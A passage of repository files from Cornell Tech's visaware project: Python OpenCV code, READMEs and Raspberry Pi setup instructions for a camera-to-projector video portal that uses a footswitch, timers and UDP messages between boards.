we should return a zero image here\n # instead\n if time.time() - self.start_time < IDLE_START_TIME:\n # Do nothing for the first IDLE_START_TIME seconds\n time.sleep(IDLE_START_TIME / 10.0)\n return knn_img\n\n # this block detects motion changes (on->off / off->on) and as soon\n # as it sees the on->off\n if nnz > MOTION_MIN_NNZ:\n if not self.moving:\n # there's some motion but self.moving is off so this means\n # we have just detected an off->on switch\n print('Motion change: OFF --> ON')\n self.moving = True\n self.max_nnz = 0\n elif self.moving:\n # no motion whatsoever, but self.moving is true so this means\n # we have just detected an on->off switch\n now = time.time()\n delta_time = now - self.last_time\n self.last_time = now\n \n print('Motion change: ON --> OFF ', delta_time)\n \n self.moving = False\n \n self.disp_img, self.start_x = self.draw_silhouette(\n self.disp_img,\n self.subimg,\n self.start_x\n )\n\n self.disp_img = (1.0 - TIME_DECAY_FACTOR) * self.disp_img\n\n return cv2.convertScaleAbs(self.disp_img)\n\n def center_image(self, img):\n \"\"\"recenters everything via bounding rect\"\"\"\n img_height, img_width = img.shape[:2]\n rect = cv2.boundingRect(img)\n bb_x, bb_y, bb_w, bb_h = rect\n\n if bb_w == 0:\n return img\n\n left_margin = bb_x\n right_margin = img_width - (bb_x + bb_w)\n\n # print('bb_x', bb_x, ' - bb_w', bb_w)\n # print('left', left_margin, ' - right', right_margin)\n\n if left_margin > 0 and left_margin >= right_margin:\n # translate left by left_margin\n translation = -0.5 * left_margin\n print('case 1', translation)\n translation_mat = np.float32([[1, 0, translation], [0, 1, 0]])\n img = cv2.warpAffine(img, translation_mat, (img_width, img_height))\n elif right_margin > 0 and right_margin >= left_margin:\n # translate right by right_margin/2\n translation = 0.5 * right_margin\n print('case 2', translation)\n translation_mat = np.float32([[1, 0, translation], [0, 1, 0]])\n img = cv2.warpAffine(img, translation_mat, (img_width, img_height))\n\n return img\n\n def draw_silhouette(self, img, subimg, start_x):\n \"\"\"draw_silhouette\"\"\"\n print('draw_silhouette(img, subimg, start_x=%d)' % start_x);\n\n img_height, img_width = img.shape[:2]\n\n subimg_height, subimg_width = subimg.shape[:2]\n\n # horizontal_translation = np.floor(0.5 * subimg_width)\n horizontal_translation = HORIZONTAL_TRANSLATION\n\n desired_subimg_height = img_height - 2 * HEIGHT_MARGIN\n\n if desired_subimg_height != subimg_height:\n factor = desired_subimg_height / subimg_height\n print('resizing height from %d to %d, factor: %f' %\n (subimg_height, desired_subimg_height, factor))\n subimg = cv2.resize(subimg, (0, 0), fx=factor, fy=factor)\n subimg_height, subimg_width = subimg.shape[:2]\n\n end_x = start_x + subimg_width\n start_y = HEIGHT_MARGIN\n end_y = HEIGHT_MARGIN + subimg_height\n\n delta_x = end_x - img_width\n # check and fix for special case (which ends up being the main case\n # once we reach it) where you've reached the right end of the image\n if delta_x > 0:\n print('SURPASSED: DRAWING SUBIMG AT RHS END')\n # shift img to left first\n translation_mat = np.float32([[1, 0, -delta_x], [0, 1, 0]])\n img = cv2.warpAffine(img, translation_mat, (img_width, img_height))\n # also modify start_x and end_x for smaller subimg\n start_x = img_width - subimg_width\n end_x = img_width\n\n img = img * PERSON_DECAY_FACTOR\n\n # grab the subwindow we will partially overwrite from the image\n prev_subimg = img[start_y:end_y, start_x:end_x]\n\n # mask has nonzero pixels of subimg\n mask 
= subimg != 0\n\n prev_subimg[mask] = subimg[mask]\n\n # cv2.imshow('prev_subimg', prev_subimg)\n\n img[start_y:end_y, start_x:end_x] = prev_subimg\n\n # img = cv2.convertScaleAbs(img)\n # img = self.center_image(img)\n\n return img, start_x + horizontal_translation\n\nif __name__ == '__main__':\n MaxKNN(sys.argv[1]).start()\n" }, { "alpha_fraction": 0.5196881294250488, "alphanum_fraction": 0.5265107154846191, "avg_line_length": 38.76744079589844, "blob_id": "1e8966344a701b066085f96f6aae1fdca329a589", "content_id": "672ba487c62bd4da787bea68008f1c5668dc4b7b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10260, "license_type": "no_license", "max_line_length": 80, "num_lines": 258, "path": "/pishow/src/avg_frames_on_button_click.py", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\"\"\"avg_frames_on_button_click.py\"\"\"\n\nimport sys\nimport time\nimport socket\nimport requests\nfrom threading import Thread, ThreadError\nimport RPi.GPIO as GPIO\nimport cv2\nimport numpy as np\nfrom avg_frames import AvgFrames\nfrom on_off_timer import OnOffTimer\n\n\n################################################################################\n# Visualization related globals\n################################################################################\n\nWINDOW_NAME = 'cam'\n\n# the number of seconds we wait for the camera stream until we decide\n# that there is no connection\nCAM_REQUEST_TIMEOUT = 3.0\n\n# path to image we show when there is no activity\nSPLASH_IMAGE_PATH = '/home/pi/workspace/visaware/pishow/src/splash.jpg'\n\nNO_CAM_IMAGE_PATH = '/home/pi/workspace/visaware/pishow/src/no_cam.jpg'\n\n################################################################################\n# Sockets-related globals\n################################################################################\n\n# One pishow (this one) is the socket server, the other pishow is socket client.\nSOCKET_PORT = 5005\n# we only send one byte at a time\nSOCKET_BUFFER_SIZE = 1\n# the number of seconds after receiving a message from the other board\n# (telling us that it just turned on) during which we will turn on this\n# board's showing machinery. i.e. we display with this board if the other\n# board has sent a message less than SOCKET_RECEIVE_TIME_THRESHOLD\n# seconds. 
This keeps projection on this board in \"on\" state for at least\n# (SOCKET_RECEIVE_TIME_THRESHOLD seconds) time.\nSOCKET_RECEIVE_TIME_THRESHOLD = 60.0\n# how long to sleep between each time you listen to a socket\nSOCKET_SERVER_THREAD_SLEEP = 0.1\n\n################################################################################\n# GPIO-related globals\n################################################################################\n\nGPIO_PIN = 18\n\n################################################################################\n# Time-related globals\n################################################################################\n\n# timer on-state duration\nTIMER_ON_SECONDS = 120\n# timer off-state duration\nTIMER_OFF_SECONDS = 3480\n# minimum duration to show the other side pisee\nMIN_SECONDS_ON = 45\n\nTOO_LONG_AGO = -1\n\nclass AvgFramesOnButtonClick():\n \"\"\"Show avg frames when switch is on, otherwise show splash screen\"\"\"\n def __init__(self, arguments):\n self.my_ip = arguments[1]\n self.other_ip = arguments[2]\n self.webcam_url = arguments[3]\n self.fullscreen_size = (int(arguments[4]), int(arguments[5]))\n\n cv2.namedWindow(WINDOW_NAME, cv2.WND_PROP_FULLSCREEN)\n cv2.setWindowProperty(WINDOW_NAME, cv2.WND_PROP_FULLSCREEN,\n cv2.WINDOW_FULLSCREEN)\n\n self.no_activity_frame = cv2.imread(SPLASH_IMAGE_PATH)\n self.no_cam_frame = cv2.imread(NO_CAM_IMAGE_PATH)\n\n self.timer = OnOffTimer(TIMER_ON_SECONDS, TIMER_OFF_SECONDS)\n self.avg_frames = AvgFrames(None)\n self.last_footstep_time = TOO_LONG_AGO\n self.last_gpio_state = None\n\n # GPIO setup\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(GPIO_PIN, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n\n # Start socket listening\n self.client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.last_socket_receive_time = None\n self.stream = None\n self.start_server_socket_thread()\n self.start_cam_thread()\n\n\n def start_cam_thread(self):\n # try:\n # self.stream = requests.get(self.webcam_url, stream=True,\n # timeout=2.0)\n # except requests.exceptions.ConnectTimeout:\n # self.stream = None\n thread = Thread(target=self.cam_thread_worker)\n thread.start()\n\n def cam_thread_worker(self):\n bytes = b''\n while True:\n if self.stream is None:\n # we have no stream\n try:\n self.stream = requests.get(self.webcam_url, stream=True,\n timeout=CAM_REQUEST_TIMEOUT)\n except (requests.exceptions.ConnectTimeout,\n requests.exceptions.ConnectionError) as err:\n self.stream = None\n print('Error: camera stream unavailable at URL %s\\n%s' %\n (self.webcam_url, err))\n cv2.imshow(WINDOW_NAME, self.no_cam_frame)\n cv2.waitKey(1)\n sys.stdout.flush()\n time.sleep(2)\n else:\n # we have a stream\n try:\n chunk = self.stream.raw.read(1024)\n\n if not chunk:\n print('NO chunk!')\n sys.stdout.flush()\n self.stream = None\n\n bytes += chunk\n\n a = bytes.find(b'\\xff\\xd8')\n b = bytes.find(b'\\xff\\xd9')\n if a != -1 and b != -1:\n jpg = bytes[a:b+2]\n bytes= bytes[b+2:]\n img = cv2.imdecode(np.fromstring(jpg, dtype=np.uint8),\n cv2.IMREAD_COLOR)\n\n # here's where we process the frame\n img = self.process_frame(img)\n\n cv2.imshow(WINDOW_NAME, img)\n if cv2.waitKey(1) == 27:\n print('Shutting down because user hit ESC ...')\n sys.stdout.flush()\n sys.exit(0)\n\n # except ThreadError as err:\n except:\n print('Camera grabbing thread error: ', sys.exc_info())\n sys.stdout.flush()\n\n\n def start_server_socket_thread(self):\n \"\"\"Start thread that listens on a socket\"\"\"\n 
try:\n            self.server_socket.bind((self.my_ip, SOCKET_PORT))\n        except OSError as os_error:\n            print('Error: cannot bind to own IP. Are you sure %s is my IP?' %\n                  self.my_ip)\n            sys.exit(-1)\n        thread = Thread(target=self.server_socket_thread_worker, args=())\n        thread.daemon = True\n        thread.start()\n\n    def server_socket_thread_worker(self):\n        \"\"\"Socket listening thread main loop\"\"\"\n        while True:\n            # the next line is a blocking call\n            data, address = self.server_socket.recvfrom(1)\n            print('received data: ', data, ', address: ', address, ', time: ',\n                  time.strftime('%X'))\n            sys.stdout.flush()\n            self.last_socket_receive_time = time.time()\n            time.sleep(SOCKET_SERVER_THREAD_SLEEP)\n\n    def tell_other_i_just_turned_on(self):\n        \"\"\"Send message telling other pishow that I've just started\"\"\"\n        self.client_socket.sendto(b'1', (self.other_ip, SOCKET_PORT))\n\n    def process_frame(self, frame):\n        \"\"\"Returns average of all frames after updating with weighted frame\"\"\"\n        gpio_state = GPIO.input(GPIO_PIN)\n\n        just_switched_gpio_state = False\n        if gpio_state != self.last_gpio_state:\n            just_switched_gpio_state = True\n            print('new GPIO state: ', gpio_state, ', time: ',\n                  time.strftime('%X'))\n            self.last_gpio_state = gpio_state\n\n        # determine whether our timer module is currently on or not\n        # and whether it just switched states (since the last time we checked)\n        timer_is_on, just_switched_timer_state = self.timer.is_on()\n\n        if just_switched_timer_state:\n            print('Timer just switched state.')\n\n        if self.last_socket_receive_time is not None:\n            time_since_message_arrived = (time.time() -\n                                          self.last_socket_receive_time)\n        else:\n            time_since_message_arrived = float('inf')\n\n        received_on_message = (time_since_message_arrived <\n                               SOCKET_RECEIVE_TIME_THRESHOLD)\n\n        # if the timer says we should be on, we turn on, regardless of anything\n        # else. same goes for if we have just received a message to turn on\n        if received_on_message or timer_is_on:\n            frame = self.avg_frames.process_frame(frame)\n        else:\n            # we have no reason to turn on camera other than local footswitch\n            if gpio_state == 1:\n                # not stepping on footswitch\n                if self.last_footstep_time == TOO_LONG_AGO:\n                    # not stepping on footswitch and last time is too long ago\n                    frame = self.no_activity_frame\n                else:\n                    # not stepping on footswitch, check if within MIN_SECONDS_ON\n                    delta_time = time.time() - self.last_footstep_time\n                    if delta_time < MIN_SECONDS_ON:\n                        # within MIN_SECONDS_ON so show real stuff\n                        frame = self.avg_frames.process_frame(frame)\n                    else:\n                        # not within MIN_SECONDS_ON so show no activity\n                        print('DISENGAGE (DELTA_TIME > %ds), time: %s' %\n                              (MIN_SECONDS_ON, time.strftime('%X')))\n                        frame = self.no_activity_frame\n                        self.last_footstep_time = TOO_LONG_AGO\n            else:\n                # stepping on footswitch\n                frame = self.avg_frames.process_frame(frame)\n                if self.last_footstep_time == TOO_LONG_AGO:\n                    print('ENGAGE (STEPPED ON MAT), time: %s' %\n                          time.strftime('%X'))\n                    self.tell_other_i_just_turned_on()\n                    # this ensures that only when we switch from state 0 to\n                    # an on state we will record self.last_footstep_time\n                    self.last_footstep_time = time.time()\n\n        sys.stdout.flush()\n\n        return cv2.resize(frame, self.fullscreen_size)\n\n\nif __name__ == '__main__':\n    AvgFramesOnButtonClick(sys.argv)\n" }, { "alpha_fraction": 0.7367088794708252, "alphanum_fraction": 0.7617088556289673, "avg_line_length": 70.81818389892578, "blob_id": "e52cede3325399bfa985040df58199d5f382eecf", "content_id": "93b6ab2951e7d0866fbf135f66cf488134eeca36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3160, "license_type": "no_license", "max_line_length": 231, "num_lines": 44, "path": "/doc/LINKS.md", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "# Relevant links\n\nHere is where we share any links that are relevant to our work on this project.\n\n* [Raspberry Pi camera bandwidth and quality discussion](https://www.raspberrypi.org/forums/viewtopic.php?f=43&t=136292)\n* [picamera documentation](https://picamera.readthedocs.io/en/release-1.13/)\n* [Video bandwidth calculations](https://www.mistralsolutions.com/video-surveillance-bandwidth-requirements-calculation-utilization/)\n* [mjpg_streamer installation](https://blog.miguelgrinberg.com/post/how-to-build-and-run-mjpg-streamer-on-the-raspberry-pi)\n* [raspicam (C++)](https://github.com/cedricve/raspicam)\n* [uv4l installation](http://www.linux-projects.org/uv4l/installation/) - not used for now. Not working after a major attempt.\n* [OpenCV installation on Raspberry Pi](https://www.pyimagesearch.com/2017/09/04/raspbian-stretch-install-opencv-3-python-on-your-raspberry-pi/) - this link works for OpenCV v 3.3.1. 
This is what we used.\n* [12 micro SD cards tested with Raspberry Pi](https://www.geek.com/chips/a-geek-tests-12-micro-sd-cards-with-a-raspberry-pi-to-find-the-fastest-1641182/)\n\n### Using OpenCV on pishow\n* [Official OpenCV docs](https://docs.opencv.org/3.0-beta/doc/py_tutorials/py_gui/py_video_display/py_video_display.html)\n* [Python example 1](http://petrkout.com/electronics/low-latency-0-4-s-video-streaming-from-raspberry-pi-mjpeg-streamer-opencv/) - this is the main one that shows how to decode a stream using `urllib`\n* [Python example 2](https://www.learnopencv.com/read-write-and-display-a-video-using-opencv-cpp-python/)\n* [Python example 3](http://www.chioka.in/python-live-video-streaming-example/)\n\n#### CV Processing\n* [Background subtraction](https://docs.opencv.org/3.1.0/db/d5c/tutorial_py_bg_subtraction.html) - using `BackgroundSubtractorMOG2`\n* [FPS python code](https://www.learnopencv.com/how-to-find-frame-rate-or-frames-per-second-fps-in-opencv-python-cpp/)\n\n#### System setup related\n* [SD card images](https://softwarebakery.com/shrinking-images-on-linux)\n\n#### Prevent Raspberry Pi from falling asleep\n* [This discussion so far did not work - tried all steps up to last one, hopefully this last step will do the job](https://www.bitpi.co/2015/02/14/prevent-raspberry-pi-from-sleeping/)\n\n#### Multi-threading to increase FPS\n* [Arnaud's pointer for increasing FPS via THREADING](https://www.pyimagesearch.com/2015/12/21/increasing-webcam-fps-with-python-and-opencv/)\n\n#### Matt Law's pointer to Global Interpreter Lock in Python\n* [We may have to revisit this issue so the link is here](https://opensource.com/article/17/4/grok-gil)\n* [For GIL, see also](https://en.wikipedia.org/wiki/Global_interpreter_lock)\n\n#### Latency issue (FPS is up, but huge delays) and solution\n* [This is the code on which we're basing all camera grabbing at this point - this is what fixed the latency issue finally - another multithreaded solution.](http://benhowell.github.io/guide/2015/03/09/opencv-and-web-cam-streaming)\n\n#### For later (latency / FPS best solution)\n\nThis one approach may be useful, also look at H.264 and other codecs\n\n* [Video streaming with FLASK](https://github.com/log0/video_streaming_with_flask_example)\n" }, { "alpha_fraction": 0.686274528503418, "alphanum_fraction": 0.686274528503418, "avg_line_length": 51, "blob_id": "99110132204ebcdece296c5c88c705b074dd7c25", "content_id": "2aa0611ca95ab9fc68315c819727af493cf4b769", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 51, "license_type": "no_license", "max_line_length": 51, "num_lines": 1, "path": "/pishow/src/video_stream_abc.py", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "../../../opencv-video-loops/src/video_stream_abc.py" }, { "alpha_fraction": 0.6951612830162048, "alphanum_fraction": 0.698387086391449, "avg_line_length": 40.36666488647461, "blob_id": "55a231342fa55d436cebc21bdb97f53fd9c1b258", "content_id": "0134afe4d9fb773e579b7f6c2c5edcedf913b54f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1240, "license_type": "no_license", "max_line_length": 128, "num_lines": 30, "path": "/README.md", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "# visaware\n\nThis repository contains all source code for the Visual Awareness project.\n\nDeveloped at the [Cornell Tech\nConnected Experiences Laboratory](http://cx.jacobs.cornell.edu/).\n\nCode by 
Doron Tal (2018) for a project with \nBenedetta Piantella and [Mor\nNaaman](https://people.jacobs.cornell.edu/mor/) at the Cornell\nTech [Connected Experiences\nLaboratory](http://cx.jacobs.cornell.edu/). The work of the lab is generously supported by\n[OATH](https://www.oath.com/).\n\n## Introduction\n\nThis repository contains internally used code for driving the video portal. It uses some code from the repository \n[https://github.com/cornelltech/opencv-video-loops](https://github.com/cornelltech/opencv-video-loops).\n\n\n## Contents\n\nThis section of this README file describes how files are arranged in\nthis folder.\n\nFile or directory name | Purpose\n---------------------- | -------\ndata/ | Contains sample videos for computer vision development\ndoc/ | Miscellaneous documentation and system setup documents that may be of use\npisee/ | Raspberry Pi that's connected to a camera - little development here, just the parameters used for mjpg_streamer\npishow/ | Raspberry Pi that's connected to a projector." }, { "alpha_fraction": 0.6659959554672241, "alphanum_fraction": 0.7022132873535156, "avg_line_length": 41.41666793823242, "blob_id": "1f4a80ccf1d42c3800b364c6727434cb2cd83496", "content_id": "8fb38199745b7d18555e7a79839b023db17b1c1a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 994, "license_type": "no_license", "max_line_length": 121, "num_lines": 24, "path": "/pisee/src/run_mjpg_streamer.sh", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# This is the script that runs mjpg_streamer as user pi every time\n# this device boots. It is called from /etc/rc.local during the boot\n# process.\n\n# This script contains all the command-line arguments that we want to supply\n# to mjpg_streamer for our operations. 
To change the command-line arguments of\n# the mjpg_streamer server, change them here and only here.\n\n# NOTE: mjpg_streamer has been installed in user pi's home directory.\n# The final install step 'sudo make install' puts files under /usr/local/\n\n# mjpg_streamer -i \"input_raspicam.so -x 640 -y 480 -fps 30 -br 90 -co 100 -ifx watercolour\" -o \"output_http.so -w ./www\"\n\n# Add instead -i \"input_uvc.so -r 1080x720 -n\" or any other resolution for a USB webcam.\n# You can also add effects: for example -ifx sketch\n# mjpg_streamer \\\n# -i \"input_raspicam.so -awb -x 640 -y 480 -fps 30\" \\\n# -o \"output_http.so -w ./www\"\n\nmjpg_streamer \\\n -i \"input_raspicam.so -awb -x 640 -y 480 -fps 30\" \\\n -o \"output_http.so -w ./www\"\n" }, { "alpha_fraction": 0.6851851940155029, "alphanum_fraction": 0.6851851940155029, "avg_line_length": 31.399999618530273, "blob_id": "e91b835c91ea94ac203eedc566aa1a3e0e43d5e1", "content_id": "569f40b623f029a1f6b0bc92e2ab81294e8e70fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 324, "license_type": "no_license", "max_line_length": 146, "num_lines": 10, "path": "/pisee/src/README.md", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "## pisee/src/\n\n## Contents\n\nThis section of this README file describes how files are arranged in\nthis folder.\n\nFile or directory name | Purpose\n---------------------- | -------\nrun_mjpg_streamer.sh | Wrapper script, which we put (or link to) in /home/pi/bin, to run mjpg_streamer with our choice of command-line arguments\n" }, { "alpha_fraction": 0.6531986594200134, "alphanum_fraction": 0.6531986594200134, "avg_line_length": 32, "blob_id": "1c1e588dda8fc7ea5e37b05fa38a4356b8396cd7", "content_id": "a550618cba9dedaf2d51732d712eda7309f60418", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 297, "license_type": "no_license", "max_line_length": 80, "num_lines": 9, "path": "/doc/README.md", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "## Contents\n\nThis section of this README file describes how files are arranged in\nthis folder.\n\nFile or directory name | Purpose\n---------------------- | -------\nLINKS.md | URLs relevant to the project\nip_layout.png | The IP numbers of the four boards we have set up at Cornell Tech\n" }, { "alpha_fraction": 0.6315789222717285, "alphanum_fraction": 0.6315789222717285, "avg_line_length": 38, "blob_id": "952da917baf0ad892270c375664159c95f56965d", "content_id": "ed6c4a26f7d47369a7efe4f6af9d6c50e9d6bbfb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 38, "license_type": "no_license", "max_line_length": 38, "num_lines": 1, "path": "/pishow/src/fps.py", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "../../../opencv-video-loops/src/fps.py" }, { "alpha_fraction": 0.6696654558181763, "alphanum_fraction": 0.6769749522209167, "avg_line_length": 39.42045593261719, "blob_id": "d496bf9ea50d3dc153a92fc091ddf84eb06be7c3", "content_id": "b9e18930334c1a41ddb1832ec4adf905b2737a43", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3557, "license_type": "no_license", "max_line_length": 102, "num_lines": 88, "path": "/pisee/INSTALL.md", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "# pysee installation\n\n1) Download the latest Raspbian OS image and install it via the 
instructions\n   [here](https://www.raspberrypi.org/documentation/installation/installing-images/README.md).\n2) Insert the newly created SD card into the Raspberry Pi and boot it with a\n   connected monitor, keyboard and mouse. It should finish booting to user pi's\n   desktop.\n3) Turn off bluetooth via the desktop's top right bluetooth icon\n4) Request static IP addresses from [email protected] by giving them\n   the MAC address of your device, which you can find by issuing the command \n   `ifconfig` and looking for the 'HW Addr' entry in the section that\n   corresponds to device `ethX` (typically `eth0`)\n5) While you wait for the static IP, to continue setting things up,\n   connect to Wi-Fi via the top right Wi-Fi icon\n6) Start a shell (click on the terminal icon on the top right) and \n   update / upgrade system packages:\n   ```\n   sudo apt update\n   sudo apt upgrade\n   ```\n7) Change the keyboard layout from UK (Raspberry Pi default) to a US keyboard.\n   To do this, first type in a shell on the Pi:\n   ```\n   sudo dpkg-reconfigure keyboard-configuration\n   ```\n   Choose \"Generic 104 key\" for most US keyboards. Choose US keyboard next -\n   pick the default one (top of the list).\n8) Fix the clock to have the correct time zone via\n   ```\n   sudo dpkg-reconfigure tzdata\n   ```\n9) Configure the board with\n   ```\n   sudo raspi-config\n   ```\n   Here we want to\n   * Enable the camera\n   * Set the board's hostname to `pysee`\n   * Set a password for user `pi`\n10) Clone the git repository `visaware` under the `cornelltech` organization on \n    GitHub.\n    ```\n    mkdir /home/pi/workspace\n    cd /home/pi/workspace\n    git clone http://github.com/cornelltech/visaware\n    ```\n11) Create two directories under `/home/pi`: \n\n    File or directory name | Purpose\n    ---------------------- | -------\n    `bin/`                 | Scripts that user `pi` may want to run\n    `workspace/`           | Software that user `pi` may want to build\n12) On `pisee` boards (ones with a camera) you will need `mjpg_streamer` - \n    here is how you build it: \n    * Build `mjpg-streamer` in a subdirectory of \n      `workspace/`, using this experimental (raspicam) version: \n      [https://github.com/jacksonliam/mjpg-streamer/](https://github.com/jacksonliam/mjpg-streamer/). \n      Use the instructions at the root of the GitHub repository \n      (i.e., the README.md file there). NOTE: use the `cmake` version of the build\n      instructions, i.e., build via `cmake` first. Here's a transcript:\n      ```\n      sudo apt install cmake libjpeg8-dev\n      cd /home/pi/workspace/\n      git clone https://github.com/jacksonliam/mjpg-streamer\n      cd mjpg-streamer/mjpg-streamer-experimental\n      mkdir _build\n      cd _build\n      export LD_LIBRARY_PATH=.\n      cmake ..\n      make\n      sudo make install\n      ```\n      which will place the installed executable under `/usr/local/mjpg_streamer`\n    * Link the wrapper script `run_mjpg_streamer.sh`, where we set the\n      command-line arguments we run `mjpg_streamer` with, by issuing:\n      ```\n      ln -s /home/pi/workspace/visaware/pisee/src/run_mjpg_streamer.sh /home/pi/bin/\n      ```\n13) Set up the machine for automatically starting mjpg_streamer upon boot \n    (headless or not). 
For this, just add the following line to `/etc/rc.local`:\n    ```\n    /home/pi/bin/run_mjpg_streamer.sh > /dev/null 2>&1\n    ```\n" }, { "alpha_fraction": 0.6465256810188293, "alphanum_fraction": 0.6465256810188293, "avg_line_length": 32.099998474121094, "blob_id": "384e741df4b6f3827bfa99578a1170565c46c0c6", "content_id": "b43d20a4f0746ed5e59874a3fdada0c9ec143e96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 331, "license_type": "no_license", "max_line_length": 83, "num_lines": 10, "path": "/pisee/README.md", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "# pisee\n\nThis directory contains all files, code, notes and documentation related to\nthe Raspberry Pi board grabbing the video.\n\n## Contents\nFile or directory name | Purpose\n---------------------- | -------\nREADME.md | This file\nINSTALL.md | Installation instructions for setting up the 'pysee' board\n" }, { "alpha_fraction": 0.6499999761581421, "alphanum_fraction": 0.6499999761581421, "avg_line_length": 40, "blob_id": "854c6bf378d08404bc12f22f27ed4682c8021dcb", "content_id": "f9cb6c046dd9af8378d60248d55443ec77b2747d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 40, "license_type": "no_license", "max_line_length": 40, "num_lines": 1, "path": "/pishow/src/pacer.py", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "../../../opencv-video-loops/src/pacer.py" }, { "alpha_fraction": 0.8121212124824524, "alphanum_fraction": 0.8121212124824524, "avg_line_length": 40.25, "blob_id": "e527549bed68e3fc52ba5937ac01a9aa2972d86d", "content_id": "6f8ff4695657938910b86cd698179b58f207d959", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 165, "license_type": "no_license", "max_line_length": 80, "num_lines": 4, "path": "/pishow/README.md", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "# visaware/pishow/\n\nThis directory contains all files, code, notes and documentation related to\nthe Raspberry Pi board showing/displaying/projecting the video.\n" }, { "alpha_fraction": 0.6704645156860352, "alphanum_fraction": 0.70201575756073, "avg_line_length": 42.25925827026367, "blob_id": "2cf0e28a819299f57885a12c7a3e28d3cf856c4e", "content_id": "d4c16f3f7da7d785905e3b072ecaca38a797e42d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1141, "license_type": "no_license", "max_line_length": 109, "num_lines": 27, "path": "/pishow/src/README.md", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "## visaware/pishow/src/\n\nThis directory contains all source code running on the pishow board\nfor the visaware project.\n\n### Installation - get a pishow board up and running\n1) Get an SD card with Raspbian OS installed on it to boot with.\n   *Current version is Raspbian 9 (stretch)*\n2) [Optional] Set the hostname using `raspi-config`\n3) Set the time zone using `raspi-config`\n4) Enable GPIO using `raspi-config`\n5) Clone the following two repositories into the same parent folder:\n   * [https://github.com/cornelltech/opencv-video-loops](https://github.com/cornelltech/opencv-video-loops) \n   * [https://github.com/cornelltech/visaware](https://github.com/cornelltech/visaware) \n6) Copy the file `autostart` (in this directory) as follows:\n   `cp autostart /home/pi/.config/lxsession/LXDE-pi/`\n7) Create the following three files in this 
directory:\n\nFilename | Text to put in the file (example)\n----------------------- | ---------------------------------\nOTHER_PISHOW_IP_ADDRESS | 128.84.84.130\nSCREEN_RESOLUTION | 1024x768\nWEBCAM_STREAM_URL | http://128.84.84.129:8080/?action=stream\n\n8) Reboot\n\nAnd this board is ready to go...\n" }, { "alpha_fraction": 0.6410256624221802, "alphanum_fraction": 0.6410256624221802, "avg_line_length": 39, "blob_id": "e3120ec3356bc4a513d9862d2fd9c78291053674", "content_id": "efe8d513680702c3e15f81ac81c5a081ffef8c99", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 39, "license_type": "no_license", "max_line_length": 39, "num_lines": 1, "path": "/pishow/src/gray.py", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "../../../opencv-video-loops/src/gray.py" }, { "alpha_fraction": 0.5223795771598816, "alphanum_fraction": 0.5286118984222412, "avg_line_length": 29.41666603088379, "blob_id": "a5e73e751d885e874fc98071a528c182085a3359", "content_id": "b1a87ba339091cf7c5f4a8a4c7fbfcc9c9fedabd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1765, "license_type": "no_license", "max_line_length": 80, "num_lines": 60, "path": "/pishow/src/on_off_timer.py", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\"\"\"on_off_timer.py - alternates on/off state for specific on/off durations\"\"\"\n\nimport time\n\n\nclass OnOffTimer(object):\n \"\"\"Alternate between ON and OFF states for specific On/Off durations\"\"\"\n\n def __init__(self, on_duration, off_duration, startOn=False):\n \"\"\"constructor\"\"\"\n self.on_duration = on_duration\n self.off_duration = off_duration\n self._is_on = startOn\n now = time.time()\n if startOn:\n self.turn_on_time = now\n self.turn_off_time = None\n else:\n self.turn_on_time = None\n self.turn_off_time = now\n\n def is_on(self):\n \"\"\"\n Returns whether we are on or not right now (first return value of pair),\n but it also returns whether we have just switched state from ON to OFF\n or vice versa.\n \"\"\"\n now = time.time()\n just_switched = False\n if self._is_on:\n # we are on now\n if now - self.turn_on_time > self.on_duration:\n # exceeded the ON time, turn off\n self._is_on = False\n self.turn_off_time = now\n just_switched = True\n else:\n # we are off now\n if now - self.turn_off_time > self.off_duration:\n # exceeded the OFF time, turn on\n self._is_on = True\n self.turn_on_time = now\n just_switched = True\n\n return (self._is_on, just_switched)\n\n def is_off(self):\n \"\"\"True when the timer is currently OFF (advances state just like is_on)\"\"\"\n # is_on() returns a (state, just_switched) pair, so negate only the state\n return not self.is_on()[0]\n\n\n# unit test:\nif __name__ == \"__main__\":\n TIMER = OnOffTimer(.33, .67, True)\n COUNT = 0\n while COUNT < 42:\n 